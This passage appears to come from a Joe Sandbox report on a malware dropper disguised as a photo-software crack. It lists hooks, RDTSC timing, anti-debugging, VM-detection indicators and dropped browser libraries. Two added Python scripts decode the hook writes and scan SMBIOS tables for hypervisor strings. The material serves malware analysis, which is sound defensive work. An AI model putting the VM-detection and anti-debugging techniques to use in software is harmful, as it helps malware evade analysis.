                       Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | File created: C:\Users\user\AppData\LocalLow\mozglue.dll
                       Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | File created: C:\Users\user\AppData\LocalLow\nss3.dll
                       Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | File created: C:\Users\user\AppData\LocalLow\vcruntime140.dll
                       Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | File created: C:\Users\user\AppData\LocalLow\sqlite3.dll
                       Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe | File created: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp
                       Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | File created: C:\Users\user\AppData\LocalLow\freebl3.dll
                       Source: C:\Users\user\Desktop\KbqArOlW06.exe | File created: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | File created: C:\Users\user\AppData\Local\Temp\is-Q7MJ8.tmp\_isetup\_setup64.tmp

                      Hooking and other Techniques for Hiding and Protection

                       Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | Memory written: PID: 2332 base: 960005 value: E9 FB 99 A8 76
                       Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | Memory written: PID: 2332 base: 773E9A00 value: E9 0A 66 57 89
                       Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | Memory written: PID: 2332 base: 980007 value: E9 7B 4C AA 76
                       Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | Memory written: PID: 2332 base: 77424C80 value: E9 8E B3 55 89
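Each of the four "Memory written" entries above is a five-byte E9 patch (JMP rel32). Two land at low private addresses (0x960005 and 0x980007) and two at high addresses (0x773E9A00 and 0x77424C80) of the kind occupied by system DLLs in a 32-bit process. Decoding the displacements shows they form two inline-hook pairs: the write at 0x773E9A00 redirects that function to 0x0096000F, while the write at 0x960005 jumps back to 0x773E9A05, i.e. it is the tail of a trampoline holding the five displaced prologue bytes; likewise 0x77424C80 is redirected to 0x00980013 and its trampoline at 0x980007 returns to 0x77424C87, seven bytes in. The script below is an added example, not part of the Joe Sandbox report or of the sample: it decodes the report's own entries and pairs hooks with trampolines. The report does not say which DLL or export lives at the hooked addresses, and the script does not assume one; the pairing heuristic it uses is flagged as an assumption in the comments.

```python
"""Decode the "Memory written" E9 patches from the report and pair inline
hooks with their trampolines.  Added example; the four REPORT_LINES below
are copied from the sandbox output, nothing else is from the sample."""
import re
import struct

# Copied from the report (PID 2332 is the 2.0.0-beta2.cps.exe process).
REPORT_LINES = [
    "Memory written: PID: 2332 base: 960005 value: E9 FB 99 A8 76",
    "Memory written: PID: 2332 base: 773E9A00 value: E9 0A 66 57 89",
    "Memory written: PID: 2332 base: 980007 value: E9 7B 4C AA 76",
    "Memory written: PID: 2332 base: 77424C80 value: E9 8E B3 55 89",
]

LINE_RE = re.compile(r"base:\s*([0-9A-Fa-f]+)\s+value:\s*((?:[0-9A-Fa-f]{2}\s*)+)")
MASK32 = 0xFFFFFFFF  # assumption: 32-bit process, so addresses wrap at 2^32


def decode_jmp(base, raw):
    """Destination of an E9 rel32 jump whose opcode byte sits at `base`, or None."""
    if len(raw) < 5 or raw[0] != 0xE9:
        return None
    rel = struct.unpack("<i", raw[1:5])[0]   # signed displacement ...
    return (base + 5 + rel) & MASK32          # ... relative to the next instruction


def parse_writes(lines):
    """Return [(address, destination)] for every report line that writes an E9 jump."""
    writes = []
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue
        base = int(m.group(1), 16)
        raw = bytes.fromhex(m.group(2).replace(" ", ""))
        dest = decode_jmp(base, raw)
        if dest is not None:
            writes.append((base, dest))
    return writes


def pair_hooks(writes, max_stolen=16):
    """Pair each hook JMP (function start -> handler) with its trampoline JMP.

    The trampoline holds the n prologue bytes the hook overwrote and ends with
    a jump back to hooked_function + n, where 5 <= n <= max_stolen.
    """
    candidates = []
    for hooked, handler in writes:
        for tramp_jmp, back in writes:
            if tramp_jmp == hooked:
                continue
            stolen = (back - hooked) & MASK32
            if 5 <= stolen <= max_stolen:
                candidates.append((stolen, hooked, handler, tramp_jmp))
    # The relation also holds with the roles swapped when handler and trampoline
    # share one allocation.  Assumption: the genuine pairing is the one with
    # fewer stolen bytes, because a trampoline copies only the whole
    # instructions needed to cover the 5-byte JMP.  Greedy, each write used once.
    used, hooks = set(), []
    for stolen, hooked, handler, tramp_jmp in sorted(candidates):
        if hooked in used or tramp_jmp in used:
            continue
        used.update((hooked, tramp_jmp))
        hooks.append({"hooked_function": hooked, "handler": handler,
                      "trampoline_jmp": tramp_jmp, "stolen_bytes": stolen})
    return sorted(hooks, key=lambda h: h["hooked_function"])


if __name__ == "__main__":
    for h in pair_hooks(parse_writes(REPORT_LINES)):
        print("hook at 0x%08X -> handler 0x%08X; trampoline JMP at 0x%08X returns to +%d"
              % (h["hooked_function"], h["handler"], h["trampoline_jmp"], h["stolen_bytes"]))
```

When triaging a full report, feed every "Memory written" line of one PID into `parse_writes`; a hook whose trampoline never appears usually means the displaced bytes were written in a separate, non-E9 write that this decoder ignores on purpose.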
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_0042409C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, (2 identical entries)
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_00422CEC SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_0041815E IsIconic,SetWindowPos,
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_00418160 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_0042466C IsIconic,SetActiveWindow,SetFocus,
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_00424624 IsIconic,SetActiveWindow,
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_00418814 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_0042F75C IsIconic,GetWindowLongA,GetWindowLongA,GetActiveWindow,MessageBoxA,SetActiveWindow,GetActiveWindow,MessageBoxA,SetActiveWindow,
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_00417A28 IsIconic,GetCapture,
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_00485CFC IsIconic,GetWindowLongA,ShowWindow,ShowWindow,
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_0041F5A8 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,
                       Source: C:\Users\user\Desktop\KbqArOlW06.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                       Source: C:\Users\user\Desktop\KbqArOlW06.exe | Process information set: NOOPENFILEERRORBOX (18 identical entries)
                       Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX (7 identical entries)

                      Malware Analysis System Evasion

                       Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | System information queried: FirmwareTableInformation (2 identical entries)
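The FirmwareTableInformation query above is NtQuerySystemInformation(SystemFirmwareTableInformation), the same data that kernel32's GetSystemFirmwareTable exposes. A VM-aware sample pulls the raw SMBIOS ('RSMB') or ACPI tables and searches them for hypervisor vendor strings, which fits the VMware CD-ROM device path found in this process's memory further down. The script below is an added example, not code from the report or from the sample: it walks a RawSMBIOSData blob, extracts the Type 1 manufacturer and product strings, and scans the whole table for vendor markers. The two SMBIOS blobs are constructed in the script, the marker list is an assumption, and the Windows read path only runs on Windows.

```python
"""Scan a raw SMBIOS table (what SystemFirmwareTableInformation /
GetSystemFirmwareTable('RSMB') returns) for hypervisor vendor strings.
Added example, not the sample's or the report's code; the SMBIOS blobs
below are constructed."""
import ctypes
import struct
import sys

# Vendor markers typically present in VM firmware tables (assumption: illustrative list).
VM_MARKERS = [b"vmware", b"virtualbox", b"innotek", b"qemu", b"bochs", b"xen",
              b"hyper-v", b"virtual machine"]


def find_vm_markers(blob):
    """Markers present in `blob` (case-insensitive), ordered by first occurrence."""
    low = blob.lower()
    hits = [(low.find(m), m.decode()) for m in VM_MARKERS if m in low]
    return [name for _, name in sorted(hits)]


def iter_smbios_structures(blob):
    """Walk a RawSMBIOSData blob, yielding (type, formatted_area, [strings])."""
    length = struct.unpack_from("<I", blob, 4)[0]   # header: 4 version bytes + table length
    data = blob[8:8 + length]
    pos = 0
    while pos + 4 <= len(data):
        stype, slen = data[pos], data[pos + 1]
        if slen < 4:
            break                                    # malformed header: stop rather than loop
        formatted = data[pos:pos + slen]
        pos += slen
        strings = []
        while pos < len(data) and data[pos] != 0:    # string set: NUL-terminated strings ...
            end = data.index(b"\0", pos)
            strings.append(data[pos:end].decode("latin-1"))
            pos = end + 1
        pos += 1 if strings else 2                   # ... closed by an extra NUL (two if no strings)
        yield stype, formatted, strings
        if stype == 127:                             # End-of-Table structure
            break


def system_info(blob):
    """(manufacturer, product) from the Type 1 System Information structure, or None."""
    for stype, fmt, strings in iter_smbios_structures(blob):
        if stype == 1 and len(fmt) >= 6:
            def pick(i):                             # string indexes are 1-based, 0 means none
                return strings[i - 1] if 0 < i <= len(strings) else ""
            return pick(fmt[4]), pick(fmt[5])
    return None


def read_rsmb_table():
    """Windows only: raw SMBIOS via kernel32!GetSystemFirmwareTable('RSMB'); None elsewhere."""
    if sys.platform != "win32":
        return None
    k32 = ctypes.windll.kernel32
    rsmb = 0x52534D42                                # 'RSMB' packed as a DWORD
    size = k32.GetSystemFirmwareTable(rsmb, 0, None, 0)
    buf = ctypes.create_string_buffer(size)
    k32.GetSystemFirmwareTable(rsmb, 0, buf, size)
    return buf.raw


def smbios_type1(manufacturer, product):
    """Construct a Type 1 structure (length 27, SMBIOS 2.4 layout) with two strings."""
    hdr = struct.pack("<BBHBBBB16sBBB", 1, 27, 0x0100, 1, 2, 0, 0, b"\0" * 16, 6, 0, 0)
    return hdr + manufacturer.encode() + b"\0" + product.encode() + b"\0\0"


def raw_smbios(structures):
    """Wrap structures in the 8-byte RawSMBIOSData header the Windows API returns."""
    body = b"".join(structures)
    return struct.pack("<BBBBI", 0, 2, 7, 0, len(body)) + body


# Constructed samples: one hypervisor-looking table, one bare-metal-looking table.
VM_BLOB = raw_smbios([smbios_type1("VMware, Inc.", "VMware Virtual Platform")])
BARE_METAL_BLOB = raw_smbios([smbios_type1("Example Computer Co.", "Workstation 1")])

if __name__ == "__main__":
    for label, blob in (("constructed VM", VM_BLOB), ("constructed bare metal", BARE_METAL_BLOB)):
        print(label, system_info(blob), find_vm_markers(blob) or "no VM markers")
    live = read_rsmb_table()
    if live is not None:
        print("this host", system_info(live), find_vm_markers(live) or "no VM markers")
```

The same scan is what a sandbox operator has to defeat: the strings come from the hypervisor's virtual firmware, so hiding them means patching the SMBIOS and ACPI tables the VM exposes, not the guest OS.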
                       Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | Special instruction interceptor: First address: 0000000000F3F96C instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                       Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | Special instruction interceptor: First address: 0000000000E151C1 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                       Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | RDTSC instruction interceptor: First address: 0000000000F057DF second address: 0000000000F057EA instructions: 0x00000000 rdtsc 0x00000002 mov ebp, 6C567DA2h 0x00000007 pop ebp 0x00000008 bswap esi 0x0000000a pop edi 0x0000000b rdtsc
                       Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | RDTSC instruction interceptor: First address: 0000000000F0772D second address: 0000000000E842F2 instructions: 0x00000000 rdtsc 0x00000002 test sp, 69E2h 0x00000007 cmp ebp, 35ED30BCh 0x0000000d cmc 0x0000000e sub esi, 00000008h 0x00000014 test si, bp 0x00000017 cmc 0x00000018 mov dword ptr [esi], edx 0x0000001a cmp edx, eax 0x0000001c mov dword ptr [esi+04h], eax 0x0000001f xor al, 65h 0x00000021 ror al, 00000008h 0x00000024 lea edi, dword ptr [edi-00000004h] 0x0000002a add ah, FFFFFFEFh 0x0000002d shld ax, dx, 000000ADh 0x00000032 movsx eax, sp 0x00000035 mov eax, dword ptr [edi] 0x00000037 cmc 0x00000038 test dx, si 0x0000003b xor eax, ebx 0x0000003d jmp 00007F3880CC7661h 0x00000042 not eax 0x00000044 jmp 00007F3880A70423h 0x00000049 inc eax 0x0000004a jmp 00007F3880BC463Ch 0x0000004f bswap eax 0x00000051 inc eax 0x00000052 stc 0x00000053 jmp 00007F3880E3AE9Bh 0x00000058 xor ebx, eax 0x0000005a cmc 0x0000005b add ebp, eax 0x0000005d jmp 00007F3880B9D1CAh 0x00000062 jmp 00007F3880C31C8Eh 0x00000067 lea ecx, dword ptr [esp+60h] 0x0000006b cmp esi, ecx 0x0000006d jmp 00007F3880B95358h 0x00000072 ja 00007F3880C6EB57h 0x00000078 jmp ebp 0x0000007a mov ecx, dword ptr [esi] 0x0000007c cmovnb edx, ebx 0x0000007f mov dh, 00000054h 0x00000082 rdtsc
                       Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | RDTSC instruction interceptor: First address: 0000000000E13F38 second address: 0000000000E13F4C instructions: 0x00000000 rdtsc 0x00000002 mov edi, esp 0x00000004 rcr bp, 0056h 0x00000008 sar eax, cl 0x0000000a sub esp, 000000C0h 0x00000010 mov ebx, esi 0x00000012 ror al, cl 0x00000014 rdtsc
                       Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | RDTSC instruction interceptor: First address: 0000000000E5AB1B second address: 0000000000E5AB29 instructions: 0x00000000 rdtsc 0x00000002 pop ebp 0x00000003 cmp sp, sp 0x00000006 mov ebx, ebx 0x00000008 adc dx, 4935h 0x0000000d popfd 0x0000000e rdtsc
                       Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | RDTSC instruction interceptor: First address: 0000000000E096EF second address: 0000000000E842F2 instructions: 0x00000000 rdtsc 0x00000002 cmc 0x00000003 sub esi, 00000008h 0x00000009 test dh, FFFFFFAFh 0x0000000c clc 0x0000000d mov dword ptr [esi], edx 0x0000000f mov dword ptr [esi+04h], eax 0x00000012 sub edi, 00000004h 0x00000018 btr ax, 004Ch 0x0000001d xor al, 6Eh 0x0000001f mov eax, dword ptr [edi] 0x00000021 test si, 0EC0h 0x00000026 cmc 0x00000027 xor eax, ebx 0x00000029 jmp 00007F3880C2CC7Ah 0x0000002e not eax 0x00000030 inc eax 0x00000031 jmp 00007F3880E883C8h 0x00000036 bswap eax 0x00000038 jmp 00007F3880A38857h 0x0000003d inc eax 0x0000003e cmp si, dx 0x00000041 jmp 00007F3880C1770Ch 0x00000046 xor ebx, eax 0x00000048 cmp edi, 54DC680Dh 0x0000004e jmp 00007F3880C7E24Eh 0x00000053 add ebp, eax 0x00000055 jmp 00007F3880B46358h 0x0000005a jmp 00007F3880D471C3h 0x0000005f lea ecx, dword ptr [esp+60h] 0x00000063 cmp esi, ecx 0x00000065 jmp 00007F3880B951F8h 0x0000006a ja 00007F3880C6E9F7h 0x00000070 jmp ebp 0x00000072 mov ecx, dword ptr [esi] 0x00000074 cmovnb edx, ebx 0x00000077 mov dh, 00000054h 0x0000007a rdtsc
                       Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | RDTSC instruction interceptor: First address: 0000000000A9EC46 second address: 0000000000A9EC5A instructions: 0x00000000 rdtsc 0x00000002 mov edi, esp 0x00000004 rcr bp, 0056h 0x00000008 sar eax, cl 0x0000000a sub esp, 000000C0h 0x00000010 mov ebx, esi 0x00000012 ror al, cl 0x00000014 rdtsc
                       Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | RDTSC instruction interceptor: First address: 0000000000B4EE51 second address: 0000000000B4EE5F instructions: 0x00000000 rdtsc 0x00000002 pop ebp 0x00000003 cmp sp, sp 0x00000006 mov ebx, ebx 0x00000008 adc dx, 4935h 0x0000000d popfd 0x0000000e rdtsc
                       Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | RDTSC instruction interceptor: First address: 0000000000BA7F6C second address: 0000000000BFEDE4 instructions: 0x00000000 rdtsc 0x00000002 cmc 0x00000003 sub esi, 00000008h 0x00000009 test dh, FFFFFFAFh 0x0000000c clc 0x0000000d mov dword ptr [esi], edx 0x0000000f mov dword ptr [esi+04h], eax 0x00000012 sub edi, 00000004h 0x00000018 btr ax, 004Ch 0x0000001d xor al, 6Eh 0x0000001f mov eax, dword ptr [edi] 0x00000021 test si, 0EC0h 0x00000026 cmc 0x00000027 xor eax, ebx 0x00000029 jmp 00007F3880C65F7Bh 0x0000002e not eax 0x00000030 inc eax 0x00000031 jmp 00007F3880A032B5h 0x00000036 bswap eax 0x00000038 jmp 00007F3880C9CF65h 0x0000003d inc eax 0x0000003e cmp si, dx 0x00000041 jmp 00007F3880C8C1F9h 0x00000046 xor ebx, eax 0x00000048 cmp edi, 54DC680Dh 0x0000004e jmp 00007F3880C32E1Ah 0x00000053 add ebp, eax 0x00000055 jmp 00007F3880E20AC4h 0x0000005a jmp 00007F3880A1952Eh 0x0000005f lea ecx, dword ptr [esp+60h] 0x00000063 cmp esi, ecx 0x00000065 jmp 00007F3880CA8223h 0x0000006a ja 00007F3880D08B20h 0x00000070 jmp ebp 0x00000072 mov ecx, dword ptr [esi] 0x00000074 cmovnb edx, ebx 0x00000077 mov dh, 00000054h 0x0000007a rdtsc
                       Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | RDTSC instruction interceptor: First address: 0000000000BEF6D9 second address: 0000000000BFEDE4 instructions: 0x00000000 rdtsc 0x00000002 test esp, edi 0x00000004 cmp ecx, 48F76367h 0x0000000a sub esi, 00000008h 0x00000010 mov dword ptr [esi], edx 0x00000012 cmc 0x00000013 test esp, 07E44ACCh 0x00000019 mov dword ptr [esi+04h], eax 0x0000001c bt ax, 004Bh 0x00000021 rcl al, cl 0x00000023 xchg ah, al 0x00000025 lea edi, dword ptr [edi-00000004h] 0x0000002b lahf 0x0000002c mov ax, 74F3h 0x00000030 mov eax, dword ptr [edi] 0x00000032 clc 0x00000033 xor eax, ebx 0x00000035 jmp 00007F3880AC1624h 0x0000003a not eax 0x0000003c jmp 00007F3880B1F93Ah 0x00000041 inc eax 0x00000042 bswap eax 0x00000044 jmp 00007F3880DE2414h 0x00000049 inc eax 0x0000004a cmc 0x0000004b test eax, edi 0x0000004d xor ebx, eax 0x0000004f cmc 0x00000050 cmp sp, 1B06h 0x00000055 add ebp, eax 0x00000057 jmp 00007F3880A32C34h 0x0000005c jmp 00007F3880DA6E3Bh 0x00000061 lea ecx, dword ptr [esp+60h] 0x00000065 cmp esi, ecx 0x00000067 jmp 00007F3880CA80C3h 0x0000006c ja 00007F3880D089C0h 0x00000072 jmp ebp 0x00000074 mov ecx, dword ptr [esi] 0x00000076 cmovnb edx, ebx 0x00000079 mov dh, 00000054h 0x0000007c rdtsc
                       Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | RDTSC instruction interceptor: First address: 0000000000B67EE1 second address: 0000000000B67EEC instructions: 0x00000000 rdtsc 0x00000002 mov ebp, 6C567DA2h 0x00000007 pop ebp 0x00000008 bswap esi 0x0000000a pop edi 0x0000000b rdtsc
                       Source: C:\Users\user\Desktop\KbqArOlW06.exe TID: 2236 | Thread sleep time: -922337203685477s >= -30000s
                       Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe | Evasive API call chain: GetSystemTime,DecisionNodes
                       Source: C:\Users\user\Desktop\KbqArOlW06.exe | Thread delayed: delay time: 922337203685477
                       Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\msvcp140.dll
                       Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\softokn3.dll
                       Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\mozglue.dll
                       Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nss3.dll
                       Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\vcruntime140.dll
                       Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\freebl3.dll
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-Q7MJ8.tmp\_isetup\_setup64.tmp
                       Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | Registry key enumerated: More than 174 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                       Source: C:\Users\user\Desktop\KbqArOlW06.exe | Thread delayed: delay time: 922337203685477
                       Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe | API call chain: ExitProcess graph end node
                       Source: 2.0.0-beta2.cps.exe, 00000010.00000002.507528842.00000000012B6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}!
                       Source: 2.0.0-beta2.cps.exe, 00000010.00000002.507528842.00000000012B6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: MWar&Prod_VMware_SATA_CD00#5&280b647)
                       Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | Process information queried: ProcessInformation
                       Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe | Code function: 21_2_0040A050 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_00476F44 FindFirstFileA,FindNextFileA,FindClose,
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_0049AF28 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_004650D0 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00453238 FindFirstFileA,GetLastError,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_0046554C SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00463B44 FindFirstFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeSystem information queried: ModuleInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_00450A28 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | System information queried: KernelDebuggerInformation
Source: C:\Users\user\Desktop\KbqArOlW06.exe | Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\KbqArOlW06.exe | Process created: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe "C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe"
Source: C:\Users\user\Desktop\KbqArOlW06.exe | Process created: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe "C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe"
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_0047A678 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_0042E52C AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_0042F294 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA,
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe | Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe | Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: GetLocaleInfoA,
Source: C:\Users\user\Desktop\KbqArOlW06.exe | Queries volume information: C:\Users\user\Desktop\KbqArOlW06.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe | Code function: 21_2_004026C4 GetSystemTime,
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_00455DCC GetUserNameA,
